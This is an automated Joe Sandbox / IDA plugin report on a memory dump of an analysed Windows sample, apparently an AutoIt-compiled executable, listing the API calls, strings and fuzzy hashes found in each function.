                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: LoadString$_wcslen
                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                        • API String ID: 4099089115-2391861430
                        • Opcode ID: 5e31bbe4c355802323f733320a87240b82ee4c84831d069d4d26e335e96cb9c8
                        • Instruction ID: f8c6f080c757e25164ab4cc444994bccf343113182004e112f0d5f05aee3e27c
                        • Opcode Fuzzy Hash: 5e31bbe4c355802323f733320a87240b82ee4c84831d069d4d26e335e96cb9c8
                        • Instruction Fuzzy Hash: D0514B7180020ABADF15FBA0CC46FFDBB78AF94350F148125F205722A1EB351B99DBA1
                        APIs
                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009FC272
                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009FC29A
                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009FC2CA
                        • GetLastError.KERNEL32 ref: 009FC322
                        • SetEvent.KERNEL32(?), ref: 009FC336
                        • InternetCloseHandle.WININET(00000000), ref: 009FC341
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                        • String ID:
                        • API String ID: 3113390036-3916222277
                        • Opcode ID: 09ee38b0d90b73c6b6b9588c7cb575a8b25be7451cd5b3a098a1c4ed63428e7b
                        • Instruction ID: ad5e7aceedb66219e5a07d3a256c01556378cd9c4baa39b2ed1854e4fdaedd13
                        • Opcode Fuzzy Hash: 09ee38b0d90b73c6b6b9588c7cb575a8b25be7451cd5b3a098a1c4ed63428e7b
                        • Instruction Fuzzy Hash: 0A319AB160020CAFD721DFA48E88ABB7BFCEB49794B14C51EF546D2240DB74ED059B61
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009C3AAF,?,?,Bad directive syntax error,00A1CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 009E98BC
                        • LoadStringW.USER32(00000000,?,009C3AAF,?), ref: 009E98C3
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009E9987
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: HandleLoadMessageModuleString_wcslen
                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                        • API String ID: 858772685-4153970271
                        • Opcode ID: ffd60f99588afb90a54bce0e49af26541803074f77c5125e107dfd2838c8cdba
                        • Instruction ID: 73ac59a034204345e0b8b154cc4abfe74bc5286b06ba00beae90d3ebb09f2466
                        • Opcode Fuzzy Hash: ffd60f99588afb90a54bce0e49af26541803074f77c5125e107dfd2838c8cdba
                        • Instruction Fuzzy Hash: 2721803194021ABBCF16EF90CC06FEE7739FF59700F04881AF519661A2EB759A18DB51
                        APIs
                        • GetParent.USER32 ref: 009E20AB
                        • GetClassNameW.USER32(00000000,?,00000100), ref: 009E20C0
                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 009E214D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ClassMessageNameParentSend
                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                        • API String ID: 1290815626-3381328864
                        • Opcode ID: f14131541147006197e7b5658529dbc03efd708b1f5cc4d101d18ad40df8857a
                        • Instruction ID: 59ea73f9b92e4ee68a6e5370ae67a436d5160118f8b2cbb303cc5091c3bac9d0
                        • Opcode Fuzzy Hash: f14131541147006197e7b5658529dbc03efd708b1f5cc4d101d18ad40df8857a
                        • Instruction Fuzzy Hash: 7B11297A6CC706BAF6026331EC07EE6379CDF46324B200416FB04A50E2FEB5AD035654
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                        • String ID:
                        • API String ID: 1282221369-0
                        • Opcode ID: d20f90b118eb66445beff2f10914a7a212a2752b00edb4e2c197a70ffef8ad21
                        • Instruction ID: b66297b05868fdb54cc73603d252ad424516e943a95e6ba356de892f4e81b2e4
                        • Opcode Fuzzy Hash: d20f90b118eb66445beff2f10914a7a212a2752b00edb4e2c197a70ffef8ad21
                        • Instruction Fuzzy Hash: F76129B2905301BFDB21AFF49A81BFA7BA9EF45330F0445ADF944A7282E6319D018790
                        APIs
                        • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00A15186
                        • ShowWindow.USER32(?,00000000), ref: 00A151C7
                        • ShowWindow.USER32(?,00000005,?,00000000), ref: 00A151CD
                        • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00A151D1
                          • Part of subcall function 00A16FBA: DeleteObject.GDI32(00000000), ref: 00A16FE6
                        • GetWindowLongW.USER32(?,000000F0), ref: 00A1520D
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A1521A
                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00A1524D
                        • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00A15287
                        • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00A15296
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                        • String ID:
                        • API String ID: 3210457359-0
                        • Opcode ID: 02ab91cb57fe9ccae3155ec3a3149e7d6042236f6f6078394b09a84989b313fc
                        • Instruction ID: db5ba6f0589cb32c97052eaba25cf2f1c9744b943db32ad72a189fd6f8817cb8
                        • Opcode Fuzzy Hash: 02ab91cb57fe9ccae3155ec3a3149e7d6042236f6f6078394b09a84989b313fc
                        • Instruction Fuzzy Hash: A8517031E90A08FEEF21AF78CC49BD93B65BB85321F148215F625962E0C7B5A9D0DB41
                        APIs
                        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 009D6890
                        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 009D68A9
                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009D68B9
                        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 009D68D1
                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009D68F2
                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00998874,00000000,00000000,00000000,000000FF,00000000), ref: 009D6901
                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 009D691E
                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00998874,00000000,00000000,00000000,000000FF,00000000), ref: 009D692D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                        • String ID:
                        • API String ID: 1268354404-0
                        • Opcode ID: 7e50035ac2264b8a6fe50abdfdfadf64083a9ace994e50864abf5ddb6021eab1
                        • Instruction ID: a0e012240574d30e49cf1bd74eae8ddfae508eb7a1c5753e8230d54743f7520e
                        • Opcode Fuzzy Hash: 7e50035ac2264b8a6fe50abdfdfadf64083a9ace994e50864abf5ddb6021eab1
                        • Instruction Fuzzy Hash: 2F518870640209EFDF20CF68CC55BAA7BBAFB58760F14891DF912972A0DB74E991DB40
                        APIs
                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009FC182
                        • GetLastError.KERNEL32 ref: 009FC195
                        • SetEvent.KERNEL32(?), ref: 009FC1A9
                          • Part of subcall function 009FC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009FC272
                          • Part of subcall function 009FC253: GetLastError.KERNEL32 ref: 009FC322
                          • Part of subcall function 009FC253: SetEvent.KERNEL32(?), ref: 009FC336
                          • Part of subcall function 009FC253: InternetCloseHandle.WININET(00000000), ref: 009FC341
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                        • String ID:
                        • API String ID: 337547030-0
                        • Opcode ID: 1f269a1e94cbcf3a8e7580f2637ccd7cd3bce9a6f6fcbd6cb970b9c17a8b0ceb
                        • Instruction ID: c57ce617caa4b3186952ab91940a701b646d9e6d789d02157dbcf96d84ff3930
                        • Opcode Fuzzy Hash: 1f269a1e94cbcf3a8e7580f2637ccd7cd3bce9a6f6fcbd6cb970b9c17a8b0ceb
                        • Instruction Fuzzy Hash: A6318BB124060DAFDB219FE59E44AF6BBE8FF58320B14C41DFA6682611C730E8159B60
                        APIs
                          • Part of subcall function 009E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 009E3A57
                          • Part of subcall function 009E3A3D: GetCurrentThreadId.KERNEL32 ref: 009E3A5E
                          • Part of subcall function 009E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009E25B3), ref: 009E3A65
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 009E25BD
                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009E25DB
                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 009E25DF
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 009E25E9
                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 009E2601
                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 009E2605
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 009E260F
                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 009E2623
                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 009E2627
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                        • String ID:
                        • API String ID: 2014098862-0
                        • Opcode ID: 3cddbe7e8ea17db3aac18fdd769a4fce10d956964f69cb2d2be8ecbed717ee7f
                        • Instruction ID: dead46333b6bcbb873092e42e4d06ff1e805c037b1004b2071915f42ca69a5b3
                        • Opcode Fuzzy Hash: 3cddbe7e8ea17db3aac18fdd769a4fce10d956964f69cb2d2be8ecbed717ee7f
                        • Instruction Fuzzy Hash: 4801D8303D0364BBFB10A7A9DC8EF993F59DB8EB21F104011F358AF0D1C9E118458A69
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,009E1449,?,?,00000000), ref: 009E180C
                        • HeapAlloc.KERNEL32(00000000,?,009E1449,?,?,00000000), ref: 009E1813
                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009E1449,?,?,00000000), ref: 009E1828
                        • GetCurrentProcess.KERNEL32(?,00000000,?,009E1449,?,?,00000000), ref: 009E1830
                        • DuplicateHandle.KERNEL32(00000000,?,009E1449,?,?,00000000), ref: 009E1833
                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009E1449,?,?,00000000), ref: 009E1843
                        • GetCurrentProcess.KERNEL32(009E1449,00000000,?,009E1449,?,?,00000000), ref: 009E184B
                        • DuplicateHandle.KERNEL32(00000000,?,009E1449,?,?,00000000), ref: 009E184E
                        • CreateThread.KERNEL32(00000000,00000000,009E1874,00000000,00000000,00000000), ref: 009E1868
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                        • String ID:
                        • API String ID: 1957940570-0
                        • Opcode ID: 882c0a994731823158184c5e8e0bf6d12a22ab79834400bdec90254fabcd1650
                        • Instruction ID: 519dc912583f42bd5d2b3638bf07e9561327de0df89a22db476e90b88151b18a
                        • Opcode Fuzzy Hash: 882c0a994731823158184c5e8e0bf6d12a22ab79834400bdec90254fabcd1650
                        • Instruction Fuzzy Hash: 4501BFB52C0344BFE710EBA5DC4DF977B6CEB89B11F008511FA05DB191C6709801CB20
                        APIs
                          • Part of subcall function 009ED4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 009ED501
                          • Part of subcall function 009ED4DC: Process32FirstW.KERNEL32(00000000,?), ref: 009ED50F
                          • Part of subcall function 009ED4DC: CloseHandle.KERNEL32(00000000), ref: 009ED5DC
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A0A16D
                        • GetLastError.KERNEL32 ref: 00A0A180
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A0A1B3
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00A0A268
                        • GetLastError.KERNEL32(00000000), ref: 00A0A273
                        • CloseHandle.KERNEL32(00000000), ref: 00A0A2C4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                        • String ID: SeDebugPrivilege
                        • API String ID: 2533919879-2896544425
                        • Opcode ID: 3b70ee5650e948a2b94b5a30913474ebe2dbba0b1c591b2c556a4b8e59f906cd
                        • Instruction ID: 44c48c63f344401e66e41aaf9b57a872cae9d1c00f6691159a20061962e81308
                        • Opcode Fuzzy Hash: 3b70ee5650e948a2b94b5a30913474ebe2dbba0b1c591b2c556a4b8e59f906cd
                        • Instruction Fuzzy Hash: B1617C71204342AFD710DF15D494F59BBA1AFA8318F14849CE4668B7E3C772ED45CB92
                        APIs
                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A13925
                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00A1393A
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A13954
                        • _wcslen.LIBCMT ref: 00A13999
                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00A139C6
                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A139F4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$Window_wcslen
                        • String ID: SysListView32
                        • API String ID: 2147712094-78025650
                        • Opcode ID: b4c4154f136de344c1305c3a60e41dfc296bf45e0892dcc7323565e7e43738ec
                        • Instruction ID: c3764c39f0c2982875077089cb3af6d37ea3d2d2d5b2055503bf9a155f1b1eed
                        • Opcode Fuzzy Hash: b4c4154f136de344c1305c3a60e41dfc296bf45e0892dcc7323565e7e43738ec
                        • Instruction Fuzzy Hash: 2E418172A00219ABEF219F64CC45BEA7BA9FF48350F100526F958E7281D7759E94CB90
                        APIs
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009EBCFD
                        • IsMenu.USER32(00000000), ref: 009EBD1D
                        • CreatePopupMenu.USER32 ref: 009EBD53
                        • GetMenuItemCount.USER32(013658A0), ref: 009EBDA4
                        • InsertMenuItemW.USER32(013658A0,?,00000001,00000030), ref: 009EBDCC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                        • String ID: 0$2
                        • API String ID: 93392585-3793063076
                        • Opcode ID: 11f39d49b84b8f5cf9044b8f5eef02bf6496560539bb03a2211eb5e13fe9d43e
                        • Instruction ID: 918febb205383624de96554564321f39ad35ace7c600fe664b46f04c083c3956
                        • Opcode Fuzzy Hash: 11f39d49b84b8f5cf9044b8f5eef02bf6496560539bb03a2211eb5e13fe9d43e
                        • Instruction Fuzzy Hash: C251BEB0A00289ABDF12CFAADC84BAFBBF9BF85324F148119E551972D0D7709D81CB51
                        APIs
                        • LoadIconW.USER32(00000000,00007F03), ref: 009EC913
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: IconLoad
                        • String ID: blank$info$question$stop$warning
                        • API String ID: 2457776203-404129466
                        • Opcode ID: f0f1bb452b8ce105a9d2337bcf703dfb356b6b6ea50108f9c557ce6860598d0b
                        • Instruction ID: 6bcb7d90ae21acbd664ee5d54e023ec5058721accfe7e00f53f9a2e9a6b07b03
                        • Opcode Fuzzy Hash: f0f1bb452b8ce105a9d2337bcf703dfb356b6b6ea50108f9c557ce6860598d0b
                        • Instruction Fuzzy Hash: 81118C76689346BEE7029B55DD83DEE379CDF56324B20042AF440A62C3E7F85E0252A9
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen$LocalTime
                        • String ID:
                        • API String ID: 952045576-0
                        • Opcode ID: 0017f2d240eeed9f9599c06b3120c85055ad8af7a7100d539dff73ff7b82d84f
                        • Instruction ID: e495e61a98cf468978a4fed5ed59fefc4f54fbe69111a412c67e5c30ca79238b
                        • Opcode Fuzzy Hash: 0017f2d240eeed9f9599c06b3120c85055ad8af7a7100d539dff73ff7b82d84f
                        • Instruction Fuzzy Hash: CE419065C10258B5CB11EBF48C8ABCFB7ACAF86710F508466E924E3121EB34E655C7E5
                        APIs
                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,009D682C,00000004,00000000,00000000), ref: 0099F953
                        • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,009D682C,00000004,00000000,00000000), ref: 009DF3D1
                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,009D682C,00000004,00000000,00000000), ref: 009DF454
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ShowWindow
                        • String ID:
                        • API String ID: 1268545403-0
                        • Opcode ID: 0099489d55bba76b9d2ee3b29d5d9425940b73efff9a926a6076dd25d5a16568
                        • Instruction ID: 303dc4624b900ee95acb74ec4b265c758d45527f0aaf024e6bdcde0e2d84ab19
                        • Opcode Fuzzy Hash: 0099489d55bba76b9d2ee3b29d5d9425940b73efff9a926a6076dd25d5a16568
                        • Instruction Fuzzy Hash: 13413B31244640BEDF38DB3DC8B876AFB9AAB56364F14C43DE047D6660D675A881C710
                        APIs
                        • DeleteObject.GDI32(00000000), ref: 00A12D1B
                        • GetDC.USER32(00000000), ref: 00A12D23
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A12D2E
                        • ReleaseDC.USER32(00000000,00000000), ref: 00A12D3A
                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00A12D76
                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A12D87
